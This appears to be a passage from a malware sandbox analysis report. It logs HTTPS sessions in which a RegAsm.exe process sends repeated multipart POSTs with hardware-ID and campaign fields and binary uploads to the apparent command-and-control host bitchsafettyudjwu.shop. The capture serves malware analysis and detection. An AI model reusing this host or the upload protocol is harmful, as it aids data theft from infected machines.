          2024-07-04 19:48:57 UTC1369INData Raw: 65 51 70 4d 51 34 4c 6e 68 47 33 66 7a 79 71 51 2f 2f 50 36 45 55 38 46 38 51 34 55 79 42 5a 47 71 31 76 58 57 6b 79 6c 74 77 35 73 76 69 6a 77 30 6c 63 45 37 64 2f 2f 79 36 49 63 39 2f 37 77 47 35 50 33 47 45 57 4d 55 67 61 37 2b 39 59 36 54 4b 57 47 4f 75 6e 36 58 48 4f 69 6c 32 54 64 62 32 2f 72 34 49 38 54 61 71 46 66 70 59 46 4f 70 50 6c 57 64 6e 75 50 55 79 36 49 77 63 4a 75 54 54 70 39 64 2f 63 44 77 48 36 50 72 2f 70 78 6a 78 50 4b 46 65 74 55 68 55 68 79 72 73 65 53 37 7a 2b 6a 65 6d 30 68 34 6f 72 4a 69 6b 7a 44 73 74 63 55 62 66 2f 2b 4f 72 41 4f 77 78 6f 42 48 2f 58 78 50 75 52 59 4a 74 61 72 2f 33 4f 75 47 45 55 6d 44 6d 33 65 4b 50 4f 44 41 2b 48 35 79 35 30 4c 77 53 37 43 6d 67 50 2f 70 59 57 71 31 65 79 51 67 48 32 4f 52 35 70 6f 31 51 4b
          Data Ascii: eQpMQ4LnhG3fzyqQ//P6EU8F8Q4UyBZGq1vXWkyltw5svijw0lcE7d//y6Ic9/7wG5P3GEWMUga7+9Y6TKWGOun6XHOil2Tdb2/r4I8TaqFfpYFOpPlWdnuPUy6IwcJuTTp9d/cDwH6Pr/pxjxPKFetUhUhyrseS7z+jem0h4orJikzDstcUbf/+OrAOwxoBH/XxPuRYJtar/3OuGEUmDm3eKPODA+H5y50LwS7CmgP/pYWq1eyQgH2OR5po1QK
          2024-07-04 19:48:57 UTC1369INData Raw: 49 4d 32 67 6d 42 5a 37 33 2b 4b 30 42 38 44 4f 6c 47 75 56 58 45 65 5a 4f 68 6d 39 73 73 50 77 78 37 70 68 61 61 4b 32 62 70 38 63 37 4a 6d 78 47 30 62 6d 2f 37 6b 6e 35 4a 2b 31 47 74 52 63 72 2b 55 61 41 62 79 36 61 2b 69 44 6e 67 46 39 6a 71 74 50 69 30 48 46 41 46 53 7a 48 75 37 47 72 42 62 35 6e 37 31 37 36 57 78 66 72 55 34 74 67 62 4c 72 36 4d 66 53 46 55 32 57 6c 6b 36 58 64 50 6a 70 78 54 4e 76 36 39 61 4d 47 38 6a 65 6e 58 72 6b 56 57 75 68 5a 78 7a 67 75 38 39 45 34 39 34 41 65 54 37 79 46 70 38 4d 75 49 33 4e 4c 6e 72 76 75 34 6d 47 56 56 4c 52 63 74 31 41 57 72 78 6e 46 49 47 79 79 38 43 6e 6a 69 31 5a 69 71 35 75 76 79 6a 6f 6e 65 6b 50 56 39 2b 4f 69 42 76 34 35 70 68 2f 79 56 42 48 6c 54 34 35 79 4c 50 32 2f 65 2b 47 53 48 44 44 6b 30 34
          Data Ascii: IM2gmBZ73+K0B8DOlGuVXEeZOhm9ssPwx7phaaK2bp8c7JmxG0bm/7kn5J+1GtRcr+UaAby6a+iDngF9jqtPi0HFAFSzHu7GrBb5n7176WxfrU4tgbLr6MfSFU2Wlk6XdPjpxTNv69aMG8jenXrkVWuhZxzgu89E494AeT7yFp8MuI3NLnrvu4mGVVLRct1AWrxnFIGyy8Cnji1Ziq5uvyjonekPV9+OiBv45ph/yVBHlT45yLP2/e+GSHDDk04
          2024-07-04 19:48:57 UTC575INData Raw: 64 56 58 56 36 2f 71 6b 43 76 41 33 70 42 37 35 56 78 76 69 51 63 63 75 4c 76 50 36 49 36 62 53 48 69 69 44 73 4c 66 5a 4e 57 70 64 55 4d 6a 7a 39 71 41 66 39 54 36 75 43 50 70 48 57 71 31 65 79 51 67 48 32 4f 52 35 70 6f 31 51 4b 50 37 52 34 4d 51 77 4a 6e 4e 4d 32 76 44 30 70 41 72 37 4f 71 63 53 2b 31 59 53 35 6b 75 43 5a 57 71 35 2f 6a 58 70 69 31 42 73 72 35 32 70 6a 33 46 71 50 6b 44 47 75 61 6e 75 53 63 67 76 71 67 62 36 52 31 6a 64 51 70 5a 78 65 62 37 74 50 61 53 6c 58 32 53 6c 6c 71 66 66 66 32 70 68 43 62 61 53 6d 72 56 4c 76 6a 69 68 58 71 38 56 57 75 39 46 69 32 4e 72 76 66 49 32 36 59 31 58 5a 36 79 64 73 73 41 36 49 48 4a 50 30 2b 76 37 70 68 76 33 4e 71 41 51 2f 30 55 5a 72 77 2f 46 49 47 75 72 76 57 4f 6b 79 6d 35 69 70 5a 2b 32 77 6a 42
          Data Ascii: dVXV6/qkCvA3pB75VxviQccuLvP6I6bSHiiDsLfZNWpdUMjz9qAf9T6uCPpHWq1eyQgH2OR5po1QKP7R4MQwJnNM2vD0pAr7OqcS+1YS5kuCZWq5/jXpi1Bsr52pj3FqPkDGuanuScgvqgb6R1jdQpZxeb7tPaSlX2Sllqfff2phCbaSmrVLvjihXq8VWu9Fi2NrvfI26Y1XZ6ydssA6IHJP0+v7phv3NqAQ/0UZrw/FIGurvWOkym5ipZ+2wjB
          2024-07-04 19:48:57 UTC1369INData Raw: 33 31 62 66 0d 0a 4e 46 6d 6b 57 70 72 6f 2f 6f 73 36 63 6f 53 41 4d 33 34 79 34 38 77 61 43 59 46 35 37 6e 34 71 78 4c 76 4b 61 41 4f 38 42 63 6c 6f 53 6e 73 43 77 66 7a 35 58 75 2b 79 42 78 64 70 5a 32 75 79 43 6b 35 4d 32 44 49 38 2f 61 38 44 75 6b 77 37 56 43 66 50 48 47 45 41 59 45 67 4e 50 47 75 64 59 37 68 4e 77 50 6d 6c 37 47 50 5a 32 6f 75 46 59 57 73 6f 76 74 5a 72 46 66 47 64 65 67 5a 63 6f 51 71 6e 67 67 48 32 4a 5a 37 38 4d 6f 45 4b 76 54 64 79 4b 52 55 51 7a 35 56 6e 71 47 7a 37 45 37 39 4c 62 38 59 39 45 45 5a 71 48 2b 35 52 33 61 2b 2b 79 7a 33 74 47 4a 76 76 4a 36 6d 32 43 35 6b 61 30 54 51 39 2f 61 36 53 62 42 58 78 6e 57 63 46 78 57 76 47 63 56 5a 4c 50 75 39 42 4b 6a 69 4e 77 50 4e 30 37 69 50 5a 32 6f 2b 63 74 33 33 2f 36 73 66 37 33
          Data Ascii: 31bfNFmkWpro/os6coSAM34y48waCYF57n4qxLvKaAO8BcloSnsCwfz5Xu+yBxdpZ2uyCk5M2DI8/a8Dukw7VCfPHGEAYEgNPGudY7hNwPml7GPZ2ouFYWsovtZrFfGdegZcoQqnggH2JZ78MoEKvTdyKRUQz5VnqGz7E79Lb8Y9EEZqH+5R3a++yz3tGJvvJ6m2C5ka0TQ9/a6SbBXxnWcFxWvGcVZLPu9BKjiNwPN07iPZ2o+ct33/6sf73
          2024-07-04 19:48:57 UTC1369INData Raw: 57 77 79 6a 52 5a 55 67 49 76 47 39 4b 75 32 46 54 6d 61 68 33 4c 48 5a 4d 6a 68 39 51 74 6d 31 2b 62 30 45 38 6e 2f 6a 58 4c 64 43 45 65 4e 48 69 6e 55 6a 6f 75 73 34 38 49 30 51 59 4c 65 65 72 49 38 41 5a 68 59 73 74 5a 4b 78 74 45 6d 6d 66 65 30 72 39 46 6b 55 36 46 65 57 4c 55 79 34 38 54 6a 71 69 31 73 6f 36 50 76 4c 70 46 52 6f 65 41 65 47 75 36 4c 69 59 5a 56 55 78 6c 37 7a 52 6c 71 33 41 39 63 79 4e 2b 61 75 62 4c 62 59 4e 41 50 4e 6a 4f 36 6e 56 45 4e 6e 4c 37 57 53 6d 75 77 66 76 6d 66 76 54 4c 6b 2f 63 59 51 71 78 33 49 73 36 37 39 37 6f 59 6c 4f 65 71 43 51 74 73 78 34 46 6b 42 47 30 2f 61 39 6f 67 4c 2b 4f 4c 30 49 37 42 73 53 37 46 75 64 58 6c 4b 59 38 54 33 68 6b 46 74 75 67 4c 50 67 67 56 64 44 46 53 79 65 39 72 48 30 53 38 64 2f 35 56 37
          Data Ascii: WwyjRZUgIvG9Ku2FTmah3LHZMjh9Qtm1+b0E8n/jXLdCEeNHinUjous48I0QYLeerI8AZhYstZKxtEmmfe0r9FkU6FeWLUy48Tjqi1so6PvLpFRoeAeGu6LiYZVUxl7zRlq3A9cyN+aubLbYNAPNjO6nVENnL7WSmuwfvmfvTLk/cYQqx3Is6797oYlOeqCQtsx4FkBG0/a9ogL+OL0I7BsS7FudXlKY8T3hkFtugLPggVdDFSye9rH0S8d/5V7


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.449734104.21.27.504437560C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-07-04 19:48:58 UTC288OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 18167
          Host: bitchsafettyudjwu.shop
          2024-07-04 19:48:58 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 37 42 38 31 41 43 43 34 33 33 39 44 36 46 38 39 32 43 32 30 46 45 36 39 45 36 42 45 38 39 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB7B81ACC4339D6F892C20FE69E6BE89--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
          2024-07-04 19:48:58 UTC2836OUTData Raw: b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8
          Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3
          2024-07-04 19:48:58 UTC802INHTTP/1.1 200 OK
          Date: Thu, 04 Jul 2024 19:48:58 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=3842f95aj1k9oe6ehih88ur69q; expires=Mon, 28-Oct-2024 13:35:37 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2Dt1i4nTlMbgFluVImwRbk8Cp70ElYqK5k86xES%2FGmyhejYhdLztdb2yWomNabqrD78EPWocIvF4dZSeWnO2R9k8yoq9JqwhBedz%2Bq282RZ8z9yeP4IVqLCf9AZ8VZoCW5Bo7qrayfu"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 89e1a2c72fa517fd-EWR
          alt-svc: h3=":443"; ma=86400
          2024-07-04 19:48:58 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
          Data Ascii: eok 8.46.123.33
          2024-07-04 19:48:58 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.449737104.21.27.504437560C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-07-04 19:48:59 UTC287OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8788
          Host: bitchsafettyudjwu.shop
          2024-07-04 19:48:59 UTC8788OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 37 42 38 31 41 43 43 34 33 33 39 44 36 46 38 39 32 43 32 30 46 45 36 39 45 36 42 45 38 39 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB7B81ACC4339D6F892C20FE69E6BE89--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
          2024-07-04 19:48:59 UTC804INHTTP/1.1 200 OK
          Date: Thu, 04 Jul 2024 19:48:59 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=56oik75g1647f0va7aikcv05se; expires=Mon, 28-Oct-2024 13:35:38 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=axB2qvtO%2FLN1KoWlfA%2FxiV4mbWE4g5ngcJmdqDsaB2aGltLwwpjGzvFr5%2BWhYrHasrDQTGntnKVYA1GwqnbPh8zbFuPzNlPIx4CgjIgxLXOZCfFoZ2ovUhMC0NWKxvvL8NclJYQ8paA2"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 89e1a2cd5c5c432c-EWR
          alt-svc: h3=":443"; ma=86400
          2024-07-04 19:48:59 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
          Data Ascii: eok 8.46.123.33
          2024-07-04 19:48:59 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          4192.168.2.449739104.21.27.504437560C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-07-04 19:49:00 UTC288OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 20441
          Host: bitchsafettyudjwu.shop
          2024-07-04 19:49:00 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 37 42 38 31 41 43 43 34 33 33 39 44 36 46 38 39 32 43 32 30 46 45 36 39 45 36 42 45 38 39 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB7B81ACC4339D6F892C20FE69E6BE89--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
          2024-07-04 19:49:00 UTC5110OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61
          Data Ascii: `M?lrQMn 64F6(X&7~`a
          2024-07-04 19:49:00 UTC814INHTTP/1.1 200 OK
          Date: Thu, 04 Jul 2024 19:49:00 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=itkiv9vf325ijetheaddq36uco; expires=Mon, 28-Oct-2024 13:35:39 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2BvLO0NHahKptNzPf%2Bo1c%2F%2FDR5LzSKQGkgTOelRI0lRht%2Bv8Kzl2yKo43yXU5XE%2FMOE3I6sL4%2F2Vqs1ywP3M9MIrXa%2FA72mj1Ewa6nrhuxPO9pyz9lnfLFg9Uo6RCW03vsmPsPmY88hB"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 89e1a2d3dc5143f9-EWR
          alt-svc: h3=":443"; ma=86400
          2024-07-04 19:49:00 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
          Data Ascii: eok 8.46.123.33
          2024-07-04 19:49:00 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          5192.168.2.449741104.21.27.504437560C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-07-04 19:49:01 UTC287OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 5442
          Host: bitchsafettyudjwu.shop
          2024-07-04 19:49:01 UTC5442OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 37 42 38 31 41 43 43 34 33 33 39 44 36 46 38 39 32 43 32 30 46 45 36 39 45 36 42 45 38 39 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB7B81ACC4339D6F892C20FE69E6BE89--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
          2024-07-04 19:49:01 UTC804INHTTP/1.1 200 OK
          Date: Thu, 04 Jul 2024 19:49:01 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=87hqn4u5krk1hpv80elqicv251; expires=Mon, 28-Oct-2024 13:35:40 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2FvCiSCrHBYHHU72Oyoho%2Fb8OY0M92IFOT%2FS1v3ldWvXhmiJYuDJhz1CXAlvWNe6WX5pLg4vjw5Ake4XJgTsROj6c4zUSfy8LOWBIKTqWrAAKAv5TIQW0BokOKzE8Ta7%2FEPnuSwQkW1"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 89e1a2dae8658c6f-EWR
          alt-svc: h3=":443"; ma=86400
          2024-07-04 19:49:01 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
          Data Ascii: eok 8.46.123.33
          2024-07-04 19:49:01 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          6192.168.2.449743104.21.27.504437560C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-07-04 19:49:02 UTC287OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 1286
          Host: bitchsafettyudjwu.shop
          2024-07-04 19:49:02 UTC1286OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 42 37 42 38 31 41 43 43 34 33 33 39 44 36 46 38 39 32 43 32 30 46 45 36 39 45 36 42 45 38 39 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 40 53 45 46 59
          Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"AB7B81ACC4339D6F892C20FE69E6BE89--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LPnhqo--@SEFY
          2024-07-04 19:49:03 UTC802INHTTP/1.1 200 OK
          Date: Thu, 04 Jul 2024 19:49:03 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=fr2nl2ff7tp0m6k23kaedkeqvu; expires=Mon, 28-Oct-2024 13:35:41 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G6l9WFD9sOgqw3b0uxaw1bM0QxN0%2BqXnKn0YG4qlYN2xgR03TDtc0JJVu8r2Dog9IgSl9FMLYbEzFm6aH3nrmbMSLPjtAFLqN%2FzCrlyF5yMw3nLa5b9MfLk82eK9Jauz9aB8lcIMfwae"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 89e1a2e1dc2815d7-EWR
          alt-svc: h3=":443"; ma=86400
          2024-07-04 19:49:03 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
          Data Ascii: eok 8.46.123.33
          2024-07-04 19:49:03 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          7192.168.2.449746104.21.27.504437560C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-07-04 19:49:04 UTC289OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 570028
          Host: bitchsafettyudjwu.shop
